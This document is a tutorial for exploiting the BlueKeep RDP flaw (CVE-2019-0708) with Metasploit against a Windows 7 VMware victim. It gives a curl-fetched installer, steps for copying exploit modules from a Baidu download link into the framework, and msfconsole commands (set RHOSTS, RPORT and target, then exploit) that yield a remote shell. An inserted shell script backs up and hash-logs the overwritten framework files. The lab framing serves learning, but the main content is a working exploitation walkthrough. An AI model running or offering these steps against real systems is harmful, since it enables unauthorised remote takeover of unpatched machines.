Vulnerability environment
Use VMware to install Windows 7 SP1 as the simulated victim machine.
Use
Preparation of attack tools
- 1. Use the following command to update the installed Metasploit framework in one step:
- `curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall`
- 2. Download the attack kit listed under Reference and place each file in the corresponding MSF folder (if a file with the same name already exists, just overwrite it):
- rdp.rb -> /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
- rdp_scanner.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
- cve_2019_0708_bluekeep.rb -> /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
- cve_2019_0708_bluekeep_rce.rb -> /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb
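Step 2 overwrites framework files with files from a third-party download, so it helps to keep the originals and a hash record of exactly what changed. The script below is an added example, not part of the original page or of the attack kit; the function names, log format and `.orig.bak` suffix are assumptions, and the relative paths are the four mappings above taken under the framework root.

```shell
# Added example, not from the original page or the kit. Function names, log
# format and the .orig.bak suffix are assumptions; paths are step 2's mappings.
MAPPINGS='rdp.rb lib/msf/core/exploit/rdp.rb
rdp_scanner.rb modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb'

sha() { sha256sum "$1" | cut -d' ' -f1; }

# stage_modules KIT_DIR MSF_ROOT LOG: copy the kit into MSF_ROOT, keeping the
# first original of each replaced file and logging old/new SHA-256 hashes.
stage_modules() {
    kit=$1; root=$2; log=$3
    # Pass 1: change nothing unless all four files are plain regular files.
    while read -r name rel; do
        if [ ! -f "$kit/$name" ] || [ -L "$kit/$name" ]; then
            echo "missing or not a regular file: $name" >&2
            return 1
        fi
    done <<EOF
$MAPPINGS
EOF
    # Pass 2: back up, log, copy.
    while read -r name rel; do
        src=$kit/$name; dst=$root/$rel; new=$(sha "$src")
        if [ -f "$dst" ]; then
            old=$(sha "$dst")
            if [ "$old" = "$new" ]; then
                echo "unchanged $rel $new" >>"$log"; continue
            fi
            [ -e "$dst.orig.bak" ] || cp -p "$dst" "$dst.orig.bak"  # keep first backup
            echo "replaced $rel $old -> $new" >>"$log"
        else
            mkdir -p "$(dirname "$dst")"
            echo "added $rel $new" >>"$log"
        fi
        cp "$src" "$dst"
    done <<EOF
$MAPPINGS
EOF
}
# restore_modules MSF_ROOT: put backed-up originals back ("added" files stay).
restore_modules() {
    while read -r name rel; do
        if [ -f "$1/$rel.orig.bak" ]; then mv "$1/$rel.orig.bak" "$1/$rel"; fi
    done <<EOF
$MAPPINGS
EOF
}
```

Call it as `stage_modules ./kit /opt/metasploit-framework/embedded/framework ./stage.log` (`./kit` being wherever the download was unpacked), then diff each `.orig.bak` against its replacement before running `reload_all`.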
Attack command
Use `msfconsole` to enter the Metasploit framework console.
Once the console is up, use `reload_all` to reload the 0708 RDP module.
Use `use exploit/windows/rdp/cve_2019_0708_bluekeep_rce` to enable the 0708 RDP attack module.
Use `info` to view the tool's information and settings.
The key settings are mainly `RHOSTS`, `RPORT` and `target`.
Use `set RHOSTS <victim machine IP>` to set the victim machine's IP.
Use `set RPORT <victim machine port>` to set the RDP port number of the victim machine.
Use `set target <ID number>` (options 0-4) to set the machine architecture of the victim machine.
Here we are using VMware, so target 2 meets the conditions.
Use `exploit` to start the attack and wait for the connection to be established. After the connection is established, get a shell and then an interactive shell; this completes the attack and yields permissions on the victim host.
Reference
Link: https://pan.baidu.com/s/1v3B8Vvi26W7LWjO3IcsNZg Extraction code: ml9g